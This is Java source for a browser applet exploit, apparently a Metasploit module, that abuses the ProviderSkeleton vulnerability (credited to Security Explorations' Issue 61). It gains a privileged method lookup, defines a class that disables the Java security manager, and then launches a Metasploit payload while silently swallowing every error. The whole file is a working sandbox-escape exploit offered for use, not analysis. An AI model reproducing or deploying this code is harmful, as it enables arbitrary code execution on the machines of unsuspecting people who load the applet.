import java.applet.Applet;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;
import metasploit.Payload;
import com.sun.tracing.Provider;
import com.sun.tracing.ProviderFactory;
/**
* Class exploiting the vulnerability in the ProviderSkeleton class. Based on
* POC of Security Explorations' Issue 61.
*
* @author mk
*
*/
public class Exploit extends Applet {
InvocationHandler invoc = null;
MethodHandles.Lookup look;
public Exploit() {
try {
ByteArrayOutputStream classInputStream = new ByteArrayOutputStream();
byte[] classBuffer = new byte[8192];
int classLength;
InputStream inputStream = getClass().getResourceAsStream(
"DisableSecurityManagerAction.class");
while ((classLength = inputStream.read(classBuffer)) > 0)
classInputStream.write(classBuffer, 0, classLength);
classBuffer = classInputStream.toByteArray();
ProviderFactory fac = ProviderFactory.getDefaultFactory();
Provider p = fac.createProvider(ExpProvider.class);
invoc = Proxy.getInvocationHandler(p);
Class handle = java.lang.invoke.MethodHandles.class;
Method m = handle.getMethod("lookup", new Class[0]);
look = (MethodHandles.Lookup) invoc.invoke(null, m, new Object[0]);
Class context = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.Context");
Class defClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.DefiningClassLoader");
Class genClassLoader = loadClassUnderPrivContext("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
MethodHandle enterMethod = getMethod(context, "enter", context,
new Class[0], true);
Class argTypes[] = new Class[1];
argTypes[0] = ClassLoader.class;
MethodHandle createClassLoader = getMethod(context,
"createClassLoader", genClassLoader, argTypes, false);
argTypes = new Class[2];
argTypes[0] = Class.forName("java.lang.String");
argTypes[1] = (new byte[0]).getClass();
MethodHandle defineClass = getMethod(defClassLoader, "defineClass",
java.lang.Class.class, argTypes, false);
Object enterContext = enterMethod.invoke();
Object cLoader = createClassLoader.invoke(enterContext, null);
Class disabler = (Class) defineClass.invoke(cLoader,
"DisableSecurityManagerAction", classBuffer);
disabler.newInstance();
Payload.main(null);
} catch (Throwable e) {
}
}
private Class loadClassUnderPrivContext(String className) throws Throwable {
Class ret = null;
Class theClass = java.lang.Class.class;
Class argTypes[] = new Class[1];
argTypes[0] = String.class;
Method m = theClass.getMethod("forName", argTypes);
Object argObjects[] = new Object[1];
argObjects[0] = className;
ret = (Class) invoc.invoke(null, m, argObjects);
return ret;
}
private MethodHandle getMethod(Class c, String methodName,
Class returnType, Class argTypes[], boolean isStaticMethod)
throws NoSuchMethodException, IllegalAccessException {
MethodHandle ret = null;
MethodType methodType = MethodType.methodType(returnType, argTypes);
if (isStaticMethod)
ret = look.findStatic(c, methodName, methodType);
else
ret = look.findVirtual(c, methodName, methodType);
return ret;
}
}